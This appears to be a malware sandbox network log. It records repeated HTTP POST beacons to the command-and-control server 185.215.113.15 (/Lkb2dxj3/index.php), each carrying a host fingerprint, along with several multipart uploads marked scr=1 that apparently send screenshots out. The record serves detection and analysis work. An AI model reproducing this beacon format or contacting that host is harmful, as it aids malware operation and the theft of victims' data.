    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d6afcb968497838ee04b7f9293290ab5Host: 185.215.113.15Content-Length: 100265Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----de41c2db1b9fd139ced25e2d3c1377b7Host: 185.215.113.15Content-Length: 97468Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----73aae0f3452507fb65ee4a8da04d958aHost: 185.215.113.15Content-Length: 95763Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
